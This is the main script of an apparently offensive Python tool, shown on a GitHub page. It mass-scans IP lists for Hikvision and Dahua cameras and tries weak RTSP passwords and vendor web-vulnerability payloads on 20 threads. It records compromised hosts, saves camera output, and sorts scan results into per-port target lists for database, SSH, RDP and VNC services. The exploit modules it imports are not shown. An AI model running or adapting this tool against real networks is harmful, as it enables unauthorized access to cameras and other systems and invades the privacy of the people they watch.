-
Notifications
You must be signed in to change notification settings - Fork 19
/
main.py
161 lines (128 loc) · 4.46 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
# encoding=utf-8
from typing import Union
from pathlib import Path
import json
from threading import Lock
from concurrent.futures import ThreadPoolExecutor
from utils.runshell import run_cmd
from utils.log import logger
from utils.rtsp_easy_pwd import get_rtsp as easypwd_get_rtsp
from utils.check_port_open import Check_Port
from hikvision.payload import get_rtsp as hk_get_rtsp
from hikvision.payload import get_cve as hk_get_cve
from dahua.payload import get_rtsp as dh_get_rtsp
from dahua.payload import get_cve as dh_get_cve
# Directory that contains this script; input lists and result files are
# resolved relative to it.
basepath = Path(__file__).parent.absolute()
# Text file that save_res() appends findings to.
res_file = Path(basepath, "res.txt")

# Root output folder plus one sub-folder per check; each sub-folder is passed
# as the second argument to the matching payload helper.
# NOTE(review): the root is hard-coded to one developer's Windows desktop —
# consider making it configurable.
photo = Path(r"C:\Users\WhaleFall\Desktop", "py_photo")
easy_rtsp = Path(photo, "easy_rtsp")
hk_rtsp = Path(photo, "hk_rtsp")
dh_rtsp = Path(photo, "dh_rtsp")
hk_cve = Path(photo, "hk_cve")

# parents=True keeps the import from crashing with FileNotFoundError when the
# parent folder does not exist yet (e.g. on another machine).
for _folder in (photo, easy_rtsp, hk_rtsp, dh_rtsp, hk_cve):
    _folder.mkdir(parents=True, exist_ok=True)

# Held by save_res() while it appends to res_file from worker threads.
lock = Lock()
def handle_macsan_json(path: Union[Path, str]) -> None:
    """Append the "ip" field of every record in a JSON file to sst.txt.

    The input is expected to be a JSON array of objects that each carry an
    "ip" key (presumably a scanner export — confirm with the producer).

    NOTE(review): a second function with this same name is defined further
    down in this module and replaces this one at import time.
    """
    source = Path(path)
    with source.open(mode="r", encoding="utf8") as fp:
        records = json.load(fp)

    target = Path(basepath, "sst.txt")
    with target.open(mode="a", encoding="utf8") as out:
        # One address per line, in the order the records appear.
        out.writelines(record["ip"] + "\n" for record in records)
def load_ips(path: Union[Path, str, None] = None) -> list:
    """Load the list of target IP addresses, one per line, sorted ascending.

    Args:
        path: File to read. When omitted (or None) the file "sst.txt" next to
            this script is used, which is the same default as before.

    Returns:
        The non-blank lines of the file with surrounding whitespace removed,
        ordered numerically octet by octet.
    """
    source = Path(basepath, "sst.txt") if path is None else Path(path)
    with source.open(mode="r", encoding="utf8") as fp:
        # Drop blank lines (including the one produced by a trailing newline)
        # so that no empty "address" is handed to the workers.
        ips = [line.strip() for line in fp if line.strip()]

    # Left-pad every octet to three digits so a plain string comparison
    # orders the addresses numerically (10.1.9.x before 10.1.10.x).
    ips.sort(key=lambda ip: "".join(
        octet.rjust(3, "0") for octet in ip.split(".")))
    return ips
def save_res(msg):
    """Log a finding and append it as one line to the results file.

    The module-level lock is held for the whole operation so that concurrent
    callers do not interleave their writes.
    """
    with lock, res_file.open(mode="a", encoding="utf8") as out:
        logger.success(msg)
        out.write(msg + "\n")
def rtsp(ip: str) -> bool:
    """Run the RTSP checks against one host.

    Returns True (after recording the finding via save_res) as soon as one of
    the three helper checks reports a hit, otherwise False. The helpers are
    tried in a fixed order and later ones are skipped once one succeeds.
    """
    # Step 1: give up early when the RTSP port (554) is not reachable.
    if not Check_Port(ip, 554):
        logger.error(f"IP:{ip} rtsp端口未开放!")
        return False

    # Step 2: try the RTSP credential checks in order: generic, Hikvision, Dahua.
    easy_res = easypwd_get_rtsp(ip, easy_rtsp)
    if easy_res:
        # The second element of the helper's result is embedded in the message.
        finding = f"[+] {ip}存在{easy_res[1]}"
    elif hk_get_rtsp(ip, hk_rtsp):
        finding = f"[+] {ip}存在海康威视弱密码!"
    elif dh_get_rtsp(ip, dh_rtsp):
        finding = f"[+] {ip}存在大华弱密码!"
    else:
        return False

    save_res(finding)
    return True
def web(ip: str) -> bool:
    """Run the web (port 80) checks against one host.

    Returns True (after recording the finding via save_res) when either helper
    check reports a hit, otherwise False. The Dahua check only runs when the
    Hikvision one did not succeed.
    """
    # Step 3: give up early when the web port (80) is not reachable.
    if not Check_Port(ip, 80):
        logger.error(f"IP:{ip} web80端口未开放!")
        return False

    # Step 4: try the vendor-specific checks in order: Hikvision, then Dahua.
    if hk_get_cve(ip, hk_cve):
        finding = f"[+] {ip}存在海康威视漏洞!"
    elif dh_get_cve(ip):
        finding = f"[+] {ip}存在大华web漏洞!"
    else:
        return False

    save_res(finding)
    return True
def payload(ip: str):
    """Run every check against a single host.

    Both the RTSP and the web checks are always executed; an error line is
    logged only when neither of them reported a finding. Returns None.
    """
    # Build the tuple first so both checks run regardless of the first result.
    outcomes = (rtsp(ip), web(ip))
    if not any(outcomes):
        logger.error(f"[-] {ip}无漏洞...")
def main():
    """Run payload() for every address from load_ips() on a 20-thread pool.

    The futures are kept so that an exception raised inside a worker is
    logged instead of being silently discarded together with its future.
    """
    with ThreadPoolExecutor(max_workers=20) as pool:
        pending = {pool.submit(payload, ip): ip for ip in load_ips()}

    # Leaving the `with` block waits for all workers, so every future is done.
    for future, ip in pending.items():
        error = future.exception()
        if error is not None:
            logger.error(f"[!] {ip} payload raised: {error!r}")
def write_res(path: Path, msg):
    """Append msg followed by a newline to the file at path.

    The file is opened in append mode with UTF-8 encoding and is created if
    it does not exist yet.
    """
    with path.open("a", encoding="utf8") as sink:
        sink.write(msg + "\n")
def handle_macsan_json(path: Union[Path, str]) -> None:
    """Sort the hosts of a JSON file into per-port text files.

    The input is expected to be a JSON array of objects with an "ip" key and
    a "ports" list whose items carry a "port" number (presumably a scanner
    export — confirm with the producer). Only the FIRST entry of "ports" is
    inspected. When it is one of 3306, 21, 22, 3389, 5900 or 8080, the host's
    address is appended to "p_<port>.txt" next to this script; all other
    hosts are ignored.

    Records with a missing or empty "ports" list are skipped instead of
    aborting the whole run with an IndexError/KeyError.
    """
    with Path(path).open(mode="r", encoding="utf8") as fp:
        records = json.load(fp)

    # Port number -> output file for hosts whose first listed port matches.
    targets = {
        port: Path(basepath, f"p_{port}.txt")
        for port in (3306, 21, 22, 3389, 5900, 8080)
    }

    for record in records:
        ports = record.get("ports")
        if not ports:
            continue
        out_file = targets.get(ports[0].get("port"))
        if out_file is not None:
            write_res(out_file, record["ip"])
if __name__ == "__main__":
    # Alternative entry points used during development, kept for reference:
    # handle_macsan_json(Path(basepath, "allsst.json"))
    # payload("10.1.6.100")  # returned normally
    # payload("10.1.9.235")  # error case
    # main()
    # run_cmd("ping baidu.com")
    scan_dump = Path(basepath, "servserall.json")
    handle_macsan_json(scan_dump)